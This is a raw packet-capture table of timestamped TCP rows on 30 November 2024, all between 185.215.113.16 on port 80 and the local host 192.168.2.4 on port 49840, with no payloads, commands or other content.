Nov 30, 2024 04:06:44.750533104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.750577927 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.750641108 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.751516104 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.751558065 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.751656055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.751702070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.752463102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.752577066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.752621889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.753432035 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.753500938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.753546953 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.754389048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.754488945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.754587889 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.755338907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.755474091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.755526066 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.756298065 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.756449938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.756494999 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.757252932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.757369995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.757412910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.758215904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.758330107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.759139061 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.759164095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.759274960 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.760154009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.760255098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.761133909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.761192083 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.761894941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.762051105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.762165070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.763005018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.763104916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.763984919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.764075041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.764919043 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.765050888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.765892029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.766011953 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.766854048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.766964912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.767832041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.767940998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.768764973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.768879890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.769738913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.769851923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.770703077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.770817995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.771651030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.781321049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.796948910 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.803417921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.900362968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.900444984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.900787115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.900850058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.901757956 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.901864052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.902702093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.902823925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.903661966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.903774977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.904630899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.904758930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.905599117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.905667067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.912934065 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.928560972 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.929388046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.929522038 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.929807901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.929811001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.929862976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.929920912 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.929969072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.930785894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.930918932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.930968046 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.931726933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.931863070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.931883097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.931932926 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.932693958 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.932805061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.933042049 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.933650017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.933784008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.933835030 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.934609890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.934737921 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.934786081 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.935587883 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.935637951 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.935707092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.936465025 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.936542988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.936639071 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.936671972 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.937494993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.937541008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.937608004 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.938049078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.938448906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.938524008 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.938559055 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.938613892 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.939418077 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.939495087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.939526081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.940381050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.940429926 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.940437078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.940479994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.941356897 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.941463947 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.941464901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.941509962 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.942285061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.942404985 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.942460060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.943250895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.943300009 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.943371058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.943474054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.944199085 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.944268942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.944314957 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.945214033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.945332050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.945358038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.945420980 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.946136951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.946249962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.946296930 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.947089911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.947225094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.947257996 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.947290897 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.948045969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.948086023 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.948170900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.948534012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.949012041 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.949057102 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.949121952 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.949263096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.949982882 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.950031042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.950088024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.950136900 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.950918913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.950968981 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.951080084 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.951124907 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.951894045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.951939106 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.952008963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.952054024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.952848911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.952953100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.952995062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.953808069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.953917027 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.953934908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.953989029 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.954751968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.954816103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.954871893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.955209970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.955729008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.955841064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.955885887 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.956696033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.956760883 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.956796885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.956903934 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.957648039 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.957757950 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.957808971 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.958600044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.958733082 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.958789110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.959583998 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.959631920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.959666967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.959769011 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.960520983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.960649014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.961473942 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.961594105 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.962428093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.962548018 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.963406086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.963515997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.964354992 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.964482069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.965322971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.965461969 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.966272116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.966389894 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.967232943 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.967343092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.968190908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.968313932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.969160080 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.969269991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.970117092 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.970233917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.971067905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.971189976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.972038031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.972158909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.973006010 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.981908083 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.982074976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.982105970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.982117891 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.101667881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.101737022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.102133989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.102251053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.103096962 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.103209019 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.104070902 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.104162931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.105065107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.105139971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.106031895 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.106085062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.106936932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.107000113 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.113465071 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.113698006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.130551100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.130662918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.131017923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.131134033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.131977081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.132093906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.132939100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.133039951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.133891106 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.134016991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.134855032 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.134898901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.135832071 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.135977030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.136774063 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.136884928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.136938095 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.137061119 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.137732983 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.137825966 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.137830019 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.138072968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.138680935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.138739109 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.138801098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.139013052 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.139807940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.139853001 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.139970064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.140010118 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.140641928 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.140780926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.140834093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.141570091 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.141611099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.141685009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.141724110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.142546892 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.142606020 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.142635107 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.142750978 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.143491030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.143532038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.143594980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.143634081 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.144457102 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.144506931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.144542933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.144587040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.145431042 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.145546913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.146364927 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.146497965 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.147352934 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.147454977 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.148305893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.148411989 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.149250984 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.149354935 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.150212049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.150327921 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.151171923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.151243925 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.152185917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.152292967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.153101921 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.153289080 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.154062986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.154196024 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.155031919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.155158997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.155992031 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.156110048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.156932116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.157047033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.157901049 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.158016920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.158886909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.158991098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.159821033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.159893036 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.159918070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.160022974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.160038948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.160058975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.160788059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.160900116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.161742926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.161871910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.162704945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.162733078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.162758112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:45.162822008 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.163681030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.163774014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.164633036 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.164777994 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.165591955 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.165712118 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:45.166553974 CET	80	49840	185.215.113.16	192.168.2.4
